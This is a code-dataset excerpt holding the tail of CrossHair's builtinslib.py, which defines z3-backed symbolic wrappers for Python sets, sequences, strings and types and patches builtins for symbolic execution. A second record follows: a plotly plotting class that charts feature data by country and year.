self._set_op('__or__', other)\n __ror__ = __or__\n\n def __xor__(self, other):\n return self._set_op('__xor__', other)\n __rxor__ = __xor__\n\n def __sub__(self, other):\n return self._set_op('__sub__', other)\n\n\nclass SmtMutableSet(SmtSet):\n def __repr__(self):\n return str(set(self))\n\n @classmethod\n def _from_iterable(cls, it):\n # overrides collections.abc.Set's version\n return set(it)\n\n def add(self, k):\n k = coerce_to_smt_var(self.statespace, k)\n old_arr, old_len = self.var\n new_len = z3.If(z3.Select(old_arr, k), old_len, old_len + 1)\n self.var = (z3.Store(old_arr, k, True), new_len)\n\n def discard(self, k):\n k = coerce_to_smt_var(self.statespace, k)\n old_arr, old_len = self.var\n new_len = z3.If(z3.Select(old_arr, k), old_len - 1, old_len)\n self.var = (z3.Store(old_arr, k, False), new_len)\n\n\nclass SmtFrozenSet(SmtSet):\n def __repr__(self):\n return frozenset(self).__repr__()\n\n def __hash__(self):\n return frozenset(self).__hash__()\n\n @classmethod\n def _from_iterable(cls, it):\n # overrides collections.abc.Set's version\n return frozenset(it)\n\n\ndef process_slice_vs_symbolic_len(\n space: StateSpace,\n i: slice,\n smt_len: z3.ExprRef\n) -> Union[z3.ExprRef, Tuple[z3.ExprRef, z3.ExprRef]]:\n def normalize_symbolic_index(idx):\n if isinstance(idx, int):\n return idx if idx >= 0 else smt_len + idx\n else:\n idx = force_to_smt_sort(space, idx, z3.IntSort())\n return z3.If(idx >= 0, idx, smt_len + idx)\n if isinstance(i, int) or isinstance(i, SmtInt):\n smt_i = smt_coerce(i)\n if space.smt_fork(z3.Or(smt_i >= smt_len, smt_i < -smt_len)):\n raise IndexError(f'index \"{i}\" is out of range')\n smt_i = normalize_symbolic_index(smt_i)\n return force_to_smt_sort(space, smt_i, z3.IntSort())\n elif isinstance(i, slice):\n smt_start, smt_stop, smt_step = (i.start, i.stop, i.step)\n if smt_step not in (None, 1):\n raise CrosshairUnsupported('slice steps not handled')\n start = normalize_symbolic_index(\n smt_start) if i.start is not None else 0\n stop = normalize_symbolic_index(\n smt_stop) if i.stop is not None else smt_len\n return (force_to_smt_sort(space, start, z3.IntSort()),\n force_to_smt_sort(space, stop, z3.IntSort()))\n else:\n raise TypeError(\n 'indices must be integers or slices, not ' + str(type(i)))\n\n\nclass SmtSequence(SmtBackedValue):\n def __iter__(self):\n idx = 0\n while len(self) > idx:\n yield self[idx]\n idx += 1\n\n def __len__(self):\n return SmtInt(self.statespace, int, z3.Length(self.var))\n\n def __bool__(self):\n return SmtBool(self.statespace, bool, z3.Length(self.var) > 0).__bool__()\n\n def __mul__(self, other):\n if not isinstance(other, int):\n raise TypeError(\"can't multiply by non-int\")\n if other <= 0:\n return self[0:0]\n ret = self\n for idx in range(1, other):\n ret = self.__add__(ret)\n return ret\n\n def __rmul__(self, other):\n return self.__mul__(other)\n\n\nclass SmtArrayBasedUniformTuple(SmtSequence):\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: Union[str, Tuple]):\n if type(smtvar) == str:\n pass\n else:\n assert type(smtvar) is tuple, f'incorrect type {type(smtvar)}'\n assert len(smtvar) == 2\n self.val_pytype = normalize_pytype(type_arg_of(typ, 0))\n self.item_smt_sort = (HeapRef if pytype_uses_heap(self.val_pytype)\n else type_to_smt_sort(self.val_pytype))\n self.key_pytype = int\n SmtBackedValue.__init__(self, statespace, typ, smtvar)\n arr_var = self._arr()\n len_var = self._len()\n self.statespace.add(len_var >= 0)\n \n self.val_ch_type = crosshair_type_for_python_type(self.val_pytype)\n \n\n def __init_var__(self, typ, varname):\n assert typ == self.python_type\n arr_smt_type = z3.ArraySort(z3.IntSort(), self.item_smt_sort)\n return (\n z3.Const(varname + '_map' + self.statespace.uniq(), arr_smt_type),\n z3.Const(varname + '_len' + self.statespace.uniq(), z3.IntSort())\n )\n\n def _arr(self):\n return self.var[0]\n\n def _len(self):\n return self.var[1]\n\n def __len__(self):\n return SmtInt(self.statespace, int, self._len())\n\n def __bool__(self):\n return SmtBool(self.statespace, bool, self._len() != 0).__bool__()\n \n def __eq__(self, other):\n (self_arr, self_len) = self.var\n if not is_iterable(other):\n return False\n if len(self) != len(other):\n return False\n for idx, v in enumerate(other):\n if self[idx] != v:\n return False\n return True\n\n def __repr__(self):\n return str(list(self))\n\n def __setitem__(self, k, v):\n raise CrosshairInternal()\n\n def __delitem__(self, k):\n raise CrosshairInternal()\n\n def __iter__(self):\n arr_var, len_var = self.var\n idx = 0\n while SmtBool(self.statespace, bool, idx < len_var).__bool__():\n yield smt_to_ch_value(self.statespace,\n self.snapshot,\n z3.Select(arr_var, idx),\n self.val_pytype)\n idx += 1\n\n def __add__(self, other):\n return SequenceConcatenation(self, other)\n\n def __radd__(self, other):\n return SequenceConcatenation(other, self)\n\n def __contains__(self, other):\n space = self.statespace\n with space.framework():\n if not smt_sort_has_heapref(self.item_smt_sort):\n smt_other = coerce_to_smt_sort(space, other, self.item_smt_sort)\n if smt_other is not None:\n # OK to perform a symbolic comparison\n idx = z3.Const('possible_idx' + space.uniq(), z3.IntSort())\n idx_in_range = z3.Exists(idx, z3.And(0 <= idx,\n idx < self._len(),\n z3.Select(self._arr(), idx) == smt_other))\n return SmtBool(space, bool, idx_in_range)\n # Fall back to standard equality and iteration\n for self_item in self:\n if self_item == other:\n return True\n return False\n\n def __getitem__(self, i):\n space = self.statespace\n with space.framework():\n if i == slice(None, None, None):\n return self\n idx_or_pair = process_slice_vs_symbolic_len(space, i, self._len())\n if isinstance(idx_or_pair, tuple):\n (start, stop) = idx_or_pair\n (myarr, mylen) = self.var\n start = SmtInt(space, int, start)\n stop = SmtInt(space, int, smt_min(mylen, smt_coerce(stop)))\n return SliceView(self, start, stop)\n else:\n smt_result = z3.Select(self._arr(), idx_or_pair)\n return smt_to_ch_value(space, self.snapshot, smt_result, self.val_pytype)\n\n def insert(self, idx, obj):\n raise CrosshairUnsupported\n\n\nclass SmtList(ShellMutableSequence, collections.abc.MutableSequence, CrossHairValue):\n def __init__(self, *a):\n ShellMutableSequence.__init__(self, SmtArrayBasedUniformTuple(*a))\n def __ch_pytype__(self):\n return python_type(self.inner)\n def __ch_realize__(self):\n return list(self)\n def _is_subclass_of_(cls, other):\n return other is list\n def __mod__(self, *a):\n raise TypeError\n def index(self, value: object, start: int = 0, stop: int = 9223372036854775807) -> int:\n '''\n Return first index of value.\n Raises ValueError if the value is not present.\n '''\n for i in range(start, min(self.__len__(), stop)):\n cur = self[i]\n if cur == value:\n return cur\n raise ValueError(f'{value} is not in list')\n\n\nclass SmtType(SmtBackedValue):\n _realization : Optional[Type] = None\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: object):\n assert origin_of(typ) is type\n self.pytype_cap = origin_of(typ.__args__[0]) if hasattr(typ, '__args__') else object\n assert type(self.pytype_cap) is type\n smt_cap = statespace.type_repo.get_type(self.pytype_cap)\n SmtBackedValue.__init__(self, statespace, typ, smtvar)\n statespace.add(statespace.type_repo.smt_issubclass(self.var, smt_cap))\n def _is_superclass_of_(self, other):\n if self is SmtType:\n return False\n if type(other) is SmtType:\n # Prefer it this way because only _is_subcless_of_ does the type cap lowering.\n return other._is_subclass_of_(self)\n space = self.statespace\n with space.framework():\n coerced = coerce_to_smt_sort(space, other, self.var.sort())\n if coerced is None:\n return False\n return SmtBool(space, bool, space.type_repo.smt_issubclass(coerced, self.var))\n def _is_subclass_of_(self, other):\n if self is SmtType:\n return False\n space = self.statespace\n with space.framework():\n coerced = coerce_to_smt_sort(space, other, self.var.sort())\n if coerced is None:\n return False\n ret = SmtBool(space, bool, space.type_repo.smt_issubclass(self.var, coerced))\n other_pytype = other.pytype_cap if type(other) is SmtType else other\n # consider lowering the type cap\n if other_pytype is not self.pytype_cap and issubclass(other_pytype, self.pytype_cap) and ret:\n self.pytype_cap = other_pytype\n return ret\n def __ch_realize__(self):\n return self._realized()\n def _realized(self):\n if self._realization is None:\n self._realization = self._realize()\n return self._realization\n def _realize(self) -> Type:\n cap = self.pytype_cap\n space = self.statespace\n if cap is object:\n pytype_to_smt = space.type_repo.pytype_to_smt\n for pytype, smt_type in pytype_to_smt.items():\n if not issubclass(pytype, cap):\n continue\n if space.smt_fork(self.var != smt_type):\n continue\n return pytype\n raise IgnoreAttempt\n else:\n subtype = choose_type(space, cap)\n smt_type = space.type_repo.get_type(subtype)\n if space.smt_fork(self.var != smt_type):\n raise IgnoreAttempt\n return subtype\n def __copy__(self):\n return self if self._realization is None else self._realization\n def __repr__(self):\n return repr(self._realized())\n def __hash__(self):\n return hash(self._realized())\n\n\nclass LazyObject(ObjectProxy):\n _inner: object = _MISSING\n\n def _realize(self):\n raise NotImplementedError\n\n def _wrapped(self):\n inner = object.__getattribute__(self, '_inner')\n if inner is _MISSING:\n inner = self._realize()\n object.__setattr__(self, '_inner', inner)\n return inner\n\n def __deepcopy__(self, memo):\n inner = object.__getattribute__(self, '_inner')\n if inner is _MISSING:\n # CrossHair will deepcopy for mutation checking.\n # That's usually bad for LazyObjects, which want to defer their\n # realization, so we simply don't do mutation checking for these\n # kinds of values right now.\n return self\n else:\n return copy.deepcopy(self.wrapped())\n\n\nclass SmtObject(LazyObject, CrossHairValue):\n '''\n An object with an unknown type.\n We lazily create a more specific smt-based value in hopes that an\n isinstance() check will be called before something is accessed on us.\n Note that this class is not an SmtBackedValue, but its _typ and _inner\n members can be.\n '''\n def __init__(self, space: StateSpace, typ: Type, varname: object):\n object.__setattr__(self, '_typ', SmtType(space, type, varname))\n object.__setattr__(self, '_space', space)\n object.__setattr__(self, '_varname', varname)\n\n def _realize(self):\n space = object.__getattribute__(self, '_space')\n varname = object.__getattribute__(self, '_varname')\n\n typ = object.__getattribute__(self, '_typ')\n pytype = realize(typ)\n debug('materializing symbolic object as an instance of', pytype)\n if pytype is object:\n return object()\n return proxy_for_type(pytype, space, varname, allow_subtypes=False)\n\n @property\n def python_type(self):\n return object.__getattribute__(self, '_typ')\n\n @property\n def __class__(self):\n return SmtObject\n\n @__class__.setter\n def __class__(self, value):\n raise CrosshairUnsupported\n\n\nclass SmtCallable(SmtBackedValue):\n __closure__ = None\n\n def __init___(self, statespace: StateSpace, typ: Type, smtvar: object):\n SmtBackedValue.__init__(self, statespace, typ, smtvar)\n\n def __eq__(self, other):\n return (self.var is other.var) if isinstance(other, SmtCallable) else False\n\n def __hash__(self):\n return id(self.var)\n\n def __init_var__(self, typ, varname):\n type_args = type_args_of(self.python_type)\n if not type_args:\n type_args = [..., Any]\n (self.arg_pytypes, self.ret_pytype) = type_args\n if self.arg_pytypes == ...:\n raise CrosshairUnsupported\n self.arg_ch_type = map(\n crosshair_type_for_python_type, self.arg_pytypes)\n self.ret_ch_type = crosshair_type_for_python_type(self.ret_pytype)\n all_pytypes = tuple(self.arg_pytypes) + (self.ret_pytype,)\n return z3.Function(varname + self.statespace.uniq(),\n *map(type_to_smt_sort, self.arg_pytypes),\n type_to_smt_sort(self.ret_pytype))\n\n def __ch_realize__(self):\n return self # we don't realize callables right now\n\n def __call__(self, *args):\n if len(args) != len(self.arg_pytypes):\n raise TypeError('wrong number of arguments')\n args = (coerce_to_smt_var(self.statespace, a) for a in args)\n smt_ret = self.var(*args)\n # TODO: detect that `smt_ret` might be a HeapRef here\n return self.ret_ch_type(self.statespace, self.ret_pytype, smt_ret)\n\n def __repr__(self):\n finterp = self.statespace.find_model_value_for_function(self.var)\n if finterp is None:\n # (z3 model completion will not interpret a function for me currently)\n return ''\n # 0-arg interpretations seem to be simply values:\n if type(finterp) is not z3.FuncInterp:\n return 'lambda :' + repr(model_value_to_python(finterp))\n if finterp.arity() < 10:\n arg_names = [chr(ord('a') + i) for i in range(finterp.arity())]\n else:\n arg_names = ['a' + str(i + 1) for i in range(finterp.arity())]\n entries = finterp.as_list()\n body = repr(model_value_to_python(entries[-1]))\n for entry in reversed(entries[:-1]):\n conditions = ['{} == {}'.format(arg, repr(model_value_to_python(val)))\n for (arg, val) in zip(arg_names, entry[:-1])]\n body = '{} if ({}) else ({})'.format(repr(model_value_to_python(entry[-1])),\n ' and '.join(conditions),\n body)\n return 'lambda ({}): {}'.format(', '.join(arg_names), body)\n\n\nclass SmtUniformTuple(SmtArrayBasedUniformTuple, collections.abc.Sequence, collections.abc.Hashable):\n def __repr__(self):\n return tuple(self).__repr__()\n\n def __hash__(self):\n return tuple(self).__hash__()\n\n\nclass SmtStr(SmtSequence, AbcString):\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: object):\n assert typ == str\n SmtBackedValue.__init__(self, statespace, typ, smtvar)\n self.item_pytype = str\n self.item_ch_type = SmtStr\n\n def __str__(self):\n return self.statespace.find_model_value(self.var)\n\n def __copy__(self):\n return SmtStr(self.statespace, str, self.var)\n\n def __repr__(self):\n return repr(self.__str__())\n\n def __hash__(self):\n return hash(self.__str__())\n\n def __add__(self, other):\n return self._binary_op(other, operator.add)\n\n def __radd__(self, other):\n return self._binary_op(other, lambda a, b: b + a)\n\n def __mul__(self, other):\n space = self.statespace\n # If repetition count is a literal, use that first:\n if type(other) == int:\n if other <= 1:\n return self if other == 1 else ''\n return SmtStr(space, str, z3.Concat(*[self.var for _ in range(other)]))\n # Else, create a new symbolic string that regex-matches as a repetition.\n # Z3 cannot do much with a symbolic regex, so we'll force ourselves into\n # a concrete string.\n concrete_self = self.__str__()\n count = force_to_smt_sort(space, other, z3.IntSort())\n result = SmtStr(space, str, str(self.var) + '_mul' + space.uniq())\n space.add(z3.InRe(result.var, z3.Star(z3.Re(concrete_self))))\n space.add(z3.Length(result.var) == len(concrete_self) * count)\n return result\n\n def __mod__(self, other):\n return self.__str__() % realize(other)\n\n def _cmp_op(self, other, op):\n forced = force_to_smt_sort(self.statespace, other, self.var.sort())\n return SmtBool(self.statespace, bool, op(self.var, forced))\n\n def __lt__(self, other):\n return self._cmp_op(other, operator.lt)\n\n def __le__(self, other):\n return self._cmp_op(other, operator.le)\n\n def __gt__(self, other):\n return self._cmp_op(other, operator.gt)\n\n def __ge__(self, other):\n return self._cmp_op(other, operator.ge)\n\n def __contains__(self, other):\n forced = force_to_smt_sort(self.statespace, other, self.var.sort())\n return SmtBool(self.statespace, bool, z3.Contains(self.var, forced))\n\n def __getitem__(self, i):\n idx_or_pair = process_slice_vs_symbolic_len(\n self.statespace, i, z3.Length(self.var))\n if isinstance(idx_or_pair, tuple):\n (start, stop) = idx_or_pair\n smt_result = z3.Extract(self.var, start, stop - start)\n else:\n smt_result = z3.Extract(self.var, idx_or_pair, 1)\n return SmtStr(self.statespace, str, smt_result)\n\n def find(self, substr, start=None, end=None):\n if end is None:\n return SmtInt(self.statespace, int,\n z3.IndexOf(self.var, smt_coerce(substr), start or 0))\n else:\n return self.__getitem__(slice(start, end, 1)).index(s)\n\n\n_CACHED_TYPE_ENUMS: Dict[FrozenSet[type], z3.SortRef] = {}\n\n\n_PYTYPE_TO_WRAPPER_TYPE = {\n type(None): (lambda *a: None),\n bool: SmtBool,\n int: SmtInt,\n float: SmtFloat,\n str: SmtStr,\n list: SmtList,\n dict: SmtDict,\n set: SmtMutableSet,\n frozenset: SmtFrozenSet,\n type: SmtType,\n}\n\n# Type ignore pending https://github.com/python/mypy/issues/6864\n_PYTYPE_TO_WRAPPER_TYPE[collections.abc.Callable] = SmtCallable # type:ignore\n\n_WRAPPER_TYPE_TO_PYTYPE = dict((v, k)\n for (k, v) in _PYTYPE_TO_WRAPPER_TYPE.items())\n\n\n#\n# Proxy making helpers\n#\n\ndef make_union_choice(creator, *pytypes):\n for typ in pytypes[:-1]:\n if creator.space.smt_fork():\n return creator(typ)\n return creator(pytypes[-1])\n\ndef make_optional_smt(smt_type):\n def make(creator, *type_args):\n ret = smt_type(creator.space, creator.pytype, creator.varname)\n if creator.space.fork_parallel(false_probability=0.98):\n ret = realize(ret)\n debug('Prematurely realized', creator.pytype, 'value')\n return ret\n return make\n\ndef make_dictionary(creator, key_type = Any, value_type = Any):\n if smt_sort_has_heapref(type_to_smt_sort(key_type)):\n return SimpleDict(proxy_for_type(List[Tuple[key_type, value_type]], creator.space, # type: ignore\n creator.varname, allow_subtypes=False))\n return SmtDict(creator.space, creator.pytype, creator.varname)\n\ndef make_tuple(creator, *type_args):\n if not type_args:\n type_args = (object, ...) # type: ignore\n if len(type_args) == 2 and type_args[1] == ...:\n return SmtUniformTuple(creator.space, creator.pytype, creator.varname)\n else:\n return tuple(proxy_for_type(t, creator.space, creator.varname + '_at_' + str(idx), allow_subtypes=True)\n for (idx, t) in enumerate(type_args))\n\ndef make_raiser(exc, *a) -> Callable:\n def do_raise(*ra, **rkw) -> NoReturn:\n raise exc(*a)\n return do_raise\n\n#\n# Monkey Patches\n#\n\n_T = TypeVar('_T')\n_VT = TypeVar('_VT')\n\nclass _BuiltinsCopy:\n pass\n\n_TRUE_BUILTINS: Any = _BuiltinsCopy()\n_TRUE_BUILTINS.__dict__.update(orig_builtins.__dict__)\n\n\n# CPython's len() forces the return value to be a native integer.\n# Avoid that requirement by making it only call __len__().\ndef _len(l):\n return l.__len__() if hasattr(l, '__len__') else [x for x in l].__len__()\n\n# Avoid calling __len__().__index__() on the input list.\n\n\ndef _sorted(l, **kw):\n ret = list(l.__iter__())\n ret.sort()\n return ret\n\n# Trick the system into believing that symbolic values are\n# native types.\n\ndef _issubclass(subclass, superclasses):\n subclass_is_special = hasattr(subclass, '_is_subclass_of_')\n if not subclass_is_special:\n # We could also check superclass(es) for a special method, but\n # the native function won't return True in those cases anyway.\n try:\n ret = _TRUE_BUILTINS.issubclass(subclass, superclasses)\n if ret:\n return True\n except TypeError:\n pass\n if type(superclasses) is not tuple:\n superclasses = (superclasses,)\n for superclass in superclasses:\n if hasattr(superclass, '_is_superclass_of_'):\n method = superclass._is_superclass_of_\n if method(subclass) if hasattr(method, '__self__') else method(subclass, superclass):\n return True\n if subclass_is_special:\n method = subclass._is_subclass_of_\n if method(superclass) if hasattr(method, '__self__') else method(subclass, superclass):\n return True\n return False\n\ndef _isinstance(obj, types):\n try:\n ret = _TRUE_BUILTINS.isinstance(obj, types)\n if ret:\n return True\n except TypeError:\n pass\n if hasattr(obj, 'python_type'):\n obj_type = obj.python_type\n if hasattr(obj_type, '__origin__'):\n obj_type = obj_type.__origin__\n else:\n obj_type = type(obj)\n return issubclass(obj_type, types)\n\n# # TODO: consider tricking the system into believing that symbolic values are\n# # native types.\n# def patched_type(self, *args):\n# ret = self.originals['type'](*args)\n# if len(args) == 1:\n# ret = _WRAPPER_TYPE_TO_PYTYPE.get(ret, ret)\n# for (original_type, proxied_type) in ProxiedObject.__dict__[\"_class_proxy_cache\"].items():\n# if ret is proxied_type:\n# return original_type\n# return ret\n\n\ndef _implies(condition: bool, consequence: bool) -> bool:\n if condition:\n return consequence\n else:\n return True\n\n\ndef _hash(obj: Hashable) -> int:\n '''\n post[]: -2**63 <= _ < 2**63\n '''\n # Skip the built-in hash if possible, because it requires the output\n # to be a native int:\n if is_hashable(obj):\n # You might think we'd say \"return obj.__hash__()\" here, but we need some\n # special gymnastics to avoid \"metaclass confusion\".\n # See: https://docs.python.org/3/reference/datamodel.html#special-method-lookup\n return type(obj).__hash__(obj)\n else:\n return _TRUE_BUILTINS.hash(obj)\n\n#def sum(i: Iterable[_T]) -> Union[_T, int]:\n# '''\n# post[]: _ == 0 or len(i) > 0\n# '''\n# return _TRUE_BUILTINS.sum(i)\n\n# def print(*a: object, **kw: Any) -> None:\n# '''\n# post: True\n# '''\n# _TRUE_BUILTINS.print(*a, **kw)\n\n\ndef _repr(arg: object) -> str:\n '''\n post[]: True\n '''\n return _TRUE_BUILTINS.repr(arg)\n\ndef _list_index(self, value, start=0, stop=9223372036854775807):\n return self.index(value, realize(start), realize(stop))\n\n\n@functools.singledispatch\ndef _max(*values, key=lambda x: x, default=_MISSING):\n return _max_iter(values, key=key, default=default)\n\n\n@_max.register(collections.Iterable)\ndef _max_iter(values: Iterable[_T], *, key: Callable = lambda x: x, default: Union[_Missing, _VT] = _MISSING) -> _T:\n '''\n pre: bool(values) or default is not _MISSING\n post[]::\n (_ in values) if default is _MISSING else True\n ((_ in values) or (_ is default)) if default is not _MISSING else True\n '''\n kw = {} if default is _MISSING else {'default': default}\n return _TRUE_BUILTINS.max(values, key=key, **kw)\n\n\n@functools.singledispatch\ndef _min(*values, key=lambda x: x, default=_MISSING):\n return _min_iter(values, key=key, default=default)\n\n\n@_min.register(collections.Iterable)\ndef _min_iter(values: Iterable[_T], *, key: Callable = lambda x: x, default: Union[_Missing, _VT] = _MISSING) -> _T:\n '''\n pre: bool(values) or default is not _MISSING\n post[]::\n (_ in values) if default is _MISSING else True\n ((_ in values) or (_ is default)) if default is not _MISSING else True\n '''\n kw = {} if default is _MISSING else {'default': default}\n return _TRUE_BUILTINS.min(values, key=key, **kw)\n\n\n#\n# Registrations\n#\n\ndef make_registrations():\n\n register_type(Union, make_union_choice)\n\n # Types modeled in the SMT solver:\n\n register_type(type(None), lambda *a: None)\n register_type(bool, make_optional_smt(SmtBool))\n register_type(int, make_optional_smt(SmtInt))\n register_type(float, make_optional_smt(SmtFloat))\n register_type(str, make_optional_smt(SmtStr))\n register_type(list, make_optional_smt(SmtList))\n register_type(dict, make_dictionary)\n register_type(tuple, make_tuple)\n register_type(set, make_optional_smt(SmtMutableSet))\n register_type(frozenset, make_optional_smt(SmtFrozenSet))\n register_type(type, make_optional_smt(SmtType))\n register_type(collections.abc.Callable, make_optional_smt(SmtCallable))\n\n # Most types are not directly modeled in the solver, rather they are built\n # on top of the modeled types. Such types are enumerated here:\n \n register_type(object, lambda p: SmtObject(p.space, p.pytype, p.varname))\n register_type(complex, lambda p: complex(p(float), p(float)))\n register_type(slice, lambda p: slice(p(Optional[int]), p(Optional[int]), p(Optional[int])))\n register_type(NoReturn, make_raiser(IgnoreAttempt, 'Attempted to short circuit a NoReturn function')) # type: ignore\n \n # AsyncContextManager, lambda p: p(contextlib.AbstractAsyncContextManager),\n # AsyncGenerator: ,\n # AsyncIterable,\n # AsyncIterator,\n # Awaitable,\n # Coroutine: (handled via typeshed)\n # Generator: (handled via typeshed)\n \n register_type(NamedTuple, lambda p, *t: p(Tuple.__getitem__(tuple(t))))\n \n register_type(re.Pattern, lambda p, t=None: p(re.compile)) # type: ignore\n register_type(re.Match, lambda p, t=None: p(re.match)) # type: ignore\n \n # Text: (elsewhere - identical to str)\n register_type(bytes, lambda p: p(ByteString))\n register_type(bytearray, lambda p: p(ByteString))\n register_type(memoryview, lambda p: p(ByteString))\n # AnyStr, (it's a type var)\n \n register_type(typing.BinaryIO, lambda p: io.BytesIO(p(ByteString)))\n # TODO: handle Any/AnyStr with a custom class that accepts str/bytes interchangably?:\n register_type(typing.IO, lambda p, t=Any: p(BinaryIO) if t == 'bytes' else p(TextIO))\n # TODO: StringIO (and BytesIO) won't accept SmtStr writes.\n # Consider clean symbolic implementations of these.\n register_type(typing.TextIO, lambda p: io.StringIO(str(p(str))))\n \n register_type(SupportsAbs, lambda p: p(int))\n register_type(SupportsFloat, lambda p: p(float))\n register_type(SupportsInt, lambda p: p(int))\n register_type(SupportsRound, lambda p: p(float))\n register_type(SupportsBytes, lambda p: p(ByteString))\n register_type(SupportsComplex, lambda p: p(complex))\n\n\n # Patches\n\n register_patch(orig_builtins, _len, 'len')\n register_patch(orig_builtins, _sorted, 'sorted')\n register_patch(orig_builtins, _issubclass, 'issubclass')\n register_patch(orig_builtins, _isinstance, 'isinstance')\n register_patch(orig_builtins, _implies, 'implies')\n register_patch(orig_builtins, _hash, 'hash')\n register_patch(orig_builtins, _repr, 'repr')\n register_patch(orig_builtins, _max, 'max')\n register_patch(orig_builtins, _min, 'min')\n\n # Patches on str\n for name in [\n 'center',\n 'count',\n 'encode',\n 'endswith',\n 'expandtabs',\n 'find',\n 'format', # TODO: shallow realization likely isn't sufficient\n 'format_map',\n 'index',\n 'ljust',\n 'lstrip',\n 'partition',\n 'replace',\n 'rfind',\n 'rindex',\n 'rjust',\n 'rpartition',\n 'rsplit',\n 'rstrip',\n 'split',\n 'splitlines',\n 'startswith',\n 'strip',\n 'translate',\n 'zfill',\n ]:\n orig_impl = getattr(orig_builtins.str, name)\n register_patch(orig_builtins.str, with_realized_args(orig_impl), name)\n\n # Patches on list\n register_patch(orig_builtins.list, _list_index, 'index')\n","sub_path":"crosshair/libimpl/builtinslib.py","file_name":"builtinslib.py","file_ext":"py","file_size_in_byte":63546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"253450447","text":"import pandas as pd\nimport numpy as np\nimport plotly.plotly as py\nimport plotly.graph_objs as go \nimport plotly \nplotly.offline.init_notebook_mode()\nfrom plotly import tools\nimport matplotlib.pyplot as plt\n\n'''\nThis module contains a class defined by us called plot\nClass plot contains 9 functions. We study through plot.ly website for use of them.\nEach function returns a plot according to feature, countries, years, and graph types selected by the user.\n'''\nclass plot():\n '''\n Initiate attributes \n df is a dataframe of feature which is selected by the user\n country is a list of countries selected by the user\n year is a list of years selected by the user\n '''\n def __init__(self,df,country,year):\n self.df = df\n self.country = country\n self.year = year\n \n '''\n Function time_series_plot returns a time-series plot\n for one country or several countries in a selected year\n '''\n def time_series_plot(self):\n specs = [[{}]]*len(self.country)\n fig = tools.make_subplots(rows=len(self.country), cols=1, specs=specs,\n shared_xaxes=True, shared_yaxes=True,\n vertical_spacing=0.001)\n \n for i in range(0,len(self.country)):\n trace = go.Scatter(x=self.df.index, y=self.df[self.country[i]],name = self.country[i])\n fig.append_trace(trace, len(self.country)-i, 1)\n\n layout = dict(\n title = 'Time Series Plot for Countries Selected' ,\n xaxis=dict(\n rangeslider=dict(),\n type='year'\n )\n )\n fig['layout'].update(layout)\n plotly.offline.iplot(fig)\n #https://plot.ly/python/time-series/ \n '''\n Function bar_plot returns a bar plot for countries in selected years\n '''\n def bar_plot(self):\n data = []\n for i in range(0,len(self.year)):\n trace = go.Bar(\n x=self.country,\n y=self.df.loc[self.year[i]][self.country],\n name = self.year[i]\n )\n data.append(trace)\n layout = go.Layout(\n title = 'Bar Plot for Countries Selected in'+str(self.year),\n xaxis=dict(tickangle=-45),\n barmode='group',\n )\n\n fig = go.Figure(data=data, layout=layout)\n plotly.offline.iplot(fig)\n \n '''\n Function scatter_plot returns a scatter plot\n '''\n def scatter_plot(self):\n data = []\n for i in range(0,len(self.country)):\n trace = go.Scatter(\n x=self.df[self.country[i]],\n y=self.df.loc[self.year][self.country[i]],\n name = self.country[i],\n mode = 'markers',\n marker = dict(\n size = 10,\n line = dict(\n width = 2,\n color = 'rgb(0, 0, 0)'\n )\n )\n )\n data.append(trace)\n layout = dict(title = 'Scatter Plot for Countries Selected in'+str(self.year),\n yaxis = dict(zeroline = False),\n xaxis = dict(zeroline = False)\n )\n\n fig = go.Figure(data = data, layout=layout)\n plotly.offline.iplot(fig)\n \n '''histogram'''\n def histogram(self):\n x0 = self.df.values.flatten()\n trace = go.Histogram(\n x=x0,\n histnorm='probability',\n opacity = 0.75\n )\n layout = dict(title = 'Histogram for Feature Selected',\n yaxis = dict(zeroline = False),\n xaxis = dict(zeroline = False)\n )\n data = [trace]\n fig = go.Figure(data=data, layout=layout)\n plotly.offline.iplot(fig)\n \n def boxplot_year(self): \n data = []\n for i in range(0,len(self.year)):\n trace = go.Box(y=self.df.loc[self.year[i]],name = self.year[i])\n data.append(trace)\n layout = dict(\n title='Boxplot according to Years',\n )\n fig = go.Figure(data = data, layout = layout)\n plotly.offline.iplot(fig)\n\n '''\n Function\n ''' \n def boxplot_country(self):\n data = []\n for i in range(0,len(self.country)):\n trace = go.Box(y=self.df[self.country[i]],name = self.country[i])\n data.append(trace)\n layout = dict(\n title='Boxplot according to Countries',\n )\n fig = go.Figure(data = data, layout = layout)\n plotly.offline.iplot(fig)\n\n '''\n Function heatmap returns a heatmap, whose y-axis is selected years and x-axis is selected countries\n ''' \n def heatmap(self):\n z = []\n for i in range(0,len(self.year)):\n data = []\n for j in range(0,len(self.country)):\n data.append(self.df.loc[self.year[i]][self.country[j]])\n z.append(data)\n \n data1 = [\n go.Heatmap(\n z=z,\n x=self.country,\n y=self.year\n )\n ]\n layout = dict(\n title='Heatmap for Selected Countries and Years',\n )\n fig = go.Figure(data = data1, layout = layout)\n plotly.offline.iplot(fig)\n\n '''\n Reference: https://plot.ly/python/heatmaps/\n Function choropleth returns a heatmap of one-year feature for selected countries\n ''' \n def choropleth(self):\n layout = dict(\n title = 'Choropleth Map',\n geo = dict(\n showframe = False,\n showcoastlines = False,\n projection = dict(\n type = 'Mercator'\n )\n )\n )\n\n for i in range(0,len(self.year)):\n data = []\n data = [ dict(\n type = 'choropleth',\n locations = self.country,\n z = self.df.loc[self.year[0]][self.country],\n text = self.country,\n colorscale = [[0,\"rgb(5, 10, 172)\"],[0.35,\"rgb(40, 60, 190)\"],\n [0.5,\"rgb(70, 100,245)\"],\\\n [0.6,\"rgb(90, 120, 245)\"],[0.7,\"rgb(106, 137, 247)\"],\n [1,\"rgb(220, 220,220)\"]],\n autocolorscale = False,\n reversescale = True,\n marker = dict(\n line = dict (\n color = 'rgb(180,180,180)',\n width = 0.5\n )),\n colorbar = dict(\n autotick = False,\n tickprefix = '$',\n title = 'Selected Feature'),\n )]\n fig = dict(data=data, layout=layout )\n plotly.offline.iplot(fig, validate=False)\n ''' \n reference:https://plot.ly/python/choropleth-maps/\n '''\n def pie_chart(self):\n fig = plt.figure()\n ax = fig.gca()\n for i in range(0,len(self.year)):\n size = self.df.loc[self.year[i]][self.country]\n size[np.isnan(size) == True] = 0\n plt.pie(size,labels = self.country, autopct = '%1.1f%%', shadow = True, startangle = 90)\n plt.title('Pie Chart for Year'+ str(self.year[i]))\n plt.axis('equal')\n plt.show()\n #gives 